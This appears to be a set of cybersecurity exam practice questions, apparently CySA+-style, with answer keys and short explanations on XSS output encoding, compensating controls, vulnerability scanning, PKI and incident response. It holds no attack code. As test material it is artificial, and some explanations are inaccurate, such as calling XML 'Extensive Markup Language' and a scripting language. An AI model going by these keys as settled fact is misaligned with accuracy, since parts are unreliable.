Output encoding is a primary defensive technique against cross-site scripting (XSS) attacks. By ensuring that user input displayed on a web page is treated as data rather than executable code, output encoding prevents the execution of malicious scripts.

While input validation is vital for ensuring that only properly formatted data enters the system, it alone doesn't address the specific scenario of XSS attacks where user input is echoed back and executed as part of the web page.

After detecting a security breach in one of the systems, the network administrator at a large organization faces a highly complex situation that does not allow them to follow the incident response process outlined in the manual. What would be the most appropriate course of action for the network administrator to take if applying compensating controls?

A.Implement a control requiring a root cause analysis to identify the solution to prevent the breach from recurring.

B.Implement a control that prioritizes the safety and security of personnel over the security breach.

C.Implement a control that emphasizes removing malware, backdoors, and compromised accounts from the hosts.

D.Implement a control that focuses on enhancing the security through a unique method but achieve the same purpose

D.Implement a control that focuses on enhancing the security through a unique method but achieve the same purpose

By focusing on enhancing security through a unique method that achieves the same purpose, the network administrator is applying a compensating control in this scenario.

A root cause analysis may be useful in identifying the cause of the security breach, but it is not a compensating control.

An IT professional is responsible for implementing vulnerability scanning methods for their organization's network. The organization has tasked the IT professional with deciding whether to use an agent-based or agentless vulnerability scanning method. What factors should the IT professional consider when making this decision? (Select the two best options.)

A.The security clearance of the personnel conducting the scan

B.The geographic location of the network being scanned

C.The size of the network being scanned

D.The presence of network firewalls

C.The size of the network being scanned

D.The presence of network firewalls

A company is implementing a PKI to enhance the validity of its communications. What is the purpose of PKI in this instance?

A.To provide secure and private communication over the internet

B.To verify the authenticity of digital documents and the identity of users or devices

C.To encrypt data transmissions between servers

D.To detect and prevent unauthorized access to the network

B.To verify the authenticity of digital documents and the identity of users or devices

Public Key Infrastructure (PKI) authenticates user identities and encrypts messages to ensure the confidentiality and security of email communications, actively managing and distributing public keys.

XML (Extensive Markup Language)

eXtensible Markup Language (XML) is a text-based scripting language that transfers data. An important differentiator of XML is that the user defines the data tags.

A company has just experienced a cyberattack, and its incident response team is in the post-incident activity phase. What is the purpose of forensic analysis during this phase?

A.To identify the cause, scope, and impact of the incident

B.To recover lost data and restore operations

C.To identify and remediate vulnerabilities

D.To update security policies and prevent future attacks

A.To identify the cause, scope, and impact of the incident

A large company has recently discovered vulnerabilities in its system. After analyzing the data, the company must prioritize these vulnerabilities based on exploitability and weaponization. Which of the following would be important for the company to consider when analyzing the data to achieve their requirements? (Select the two best options.)

A.The level of sophistication of threat actors targeting the vulnerability

B.The availability of patches for the vulnerability

C.The number of systems and people affected by the vulnerability

D.The potential damage caused by successful exploitation of the vulnerability

A.The level of sophistication of threat actors targeting the vulnerability

B.The availability of patches for the vulnerability

Based on exploitability and weaponization

A security analyst is developing a python script to analyze regular text from log files. The script will identify potential security incidents and generate alerts for further investigation. Which of the following best describes the security concept the analyst needs to implement in the python script to detect obfuscated text? (Select the two best options.)

A.Code signature verification

B.Regular expression

C.String manipulation

D.Header inspection

B.Regular expression

C.String manipulation

A company has recently upgraded to the latest version of the web application. During a review of the logs, the security analyst notices an unauthorized change made to the web application by an unknown user. Which of the following logs would most likely provide information about the unauthorized change?

A.System log

B.Application log

C.Event log

D.Security log

B.Application log

A retail company is developing an incident response plan and wants to test it to ensure it is effective. The company has decided to conduct a tabletop exercise as part of the preparation phase. What would be a tabletop exercise in this context?

A.A simulated attack on the company's network

B.A review of the company's security policies

C.A discussion-based exercise that simulates a cyber incident

D.A physical test of the company's disaster recovery plan

C.A discussion-based exercise that simulates a cyber incident

A network administrator is responsible for ensuring the security of an organization's network. The organization has tasked the administrator with implementing vulnerability scanning methods and concepts to identify potential vulnerabilities. As part of their efforts, the administrator has decided to segment the network. What scanning method would be most helpful in identifying potential vulnerabilities in the segmented network?

A.Map/discovery scan

B.Device fingerprinting

C.Static analysis

D.Dynamic analysis

B.Device fingerprinting

Device fingerprinting focuses on identifying details about individual devices, such as their purpose, vendor, software versions, configuration details, and the existence of vulnerabilities. Device fingerprinting is useful in identifying potential vulnerabilities in a segmented network where traditional scanning methods may not work effectively.

A security analyst wants to use a web application scanner to test the security of a web application. Which of the following is a feature of Burp Suite that could support the security analyst's requirements?

A.Testing for vulnerabilities in the application source code

B.Assessing the security of the underlying operating system

C.Detecting malware and viruses on the web server

D.Intercepting and modifying HTTP requests and responses

D.Intercepting and modifying HTTP requests and responses

A company has contracted a third party to develop a proprietary software application to manage its manufacturing processes. What is a common inhibitor to vulnerability management reporting and communication in this context, specifically for organizations with proprietary systems? (Select the three best options.)

A.Lack of understanding of the application's underlying architecture and dependencies

B.Fear of revealing proprietary information to external parties

C.Lack of resources to test and remediate vulnerabilities in a proprietary system

D.Incompatibility with third-party vulnerability management tools

A.Lack of understanding of the application's underlying architecture and dependencies

B.Fear of revealing proprietary information to external parties

C.Lack of resources to test and remediate vulnerabilities in a proprietary system

A newly hired cybersecurity manager oversees the organization's operational control responsibilities. Which of the following is an example of this responsibility?

A.Monitoring the network for unauthorized access attempts

B.Conducting a risk assessment to identify potential vulnerabilities in the system

C.Installing antivirus software on all company computers

D.Creating a strong password policy for employees to follow

A.Monitoring the network for unauthorized access attempts

A company is in the process of implementing a vulnerability scanning program to improve its cyber defenses. The company wants to know which scanning method (agent or agentless) would most effectively identify vulnerabilities on its network. What are the advantages of implementing agent-based compared to agentless in this context? (Select the three best options.)

A.Agent-based scanning, unlike agentless, provides detailed and accurate information through direct access to system resources.

B.Agent-based scanning, compared to agentless, provides continuous and real-time monitoring due to its host presence.

C.Agent-based scanning operates independently of network connectivity, unlike agentless scanning, which requires a stable network connection.

D.Agent-based scanning ensures that scanning activities do not affect network bandwidth since they operate locally on each host.

A.Agent-based scanning, unlike agentless, provides detailed and accurate information through direct access to system resources.

B.Agent-based scanning, compared to agentless, provides continuous and real-time monitoring due to its host presence.

C.Agent-based scanning operates independently of network connectivity, unlike agentless scanning, which requires a stable network connection.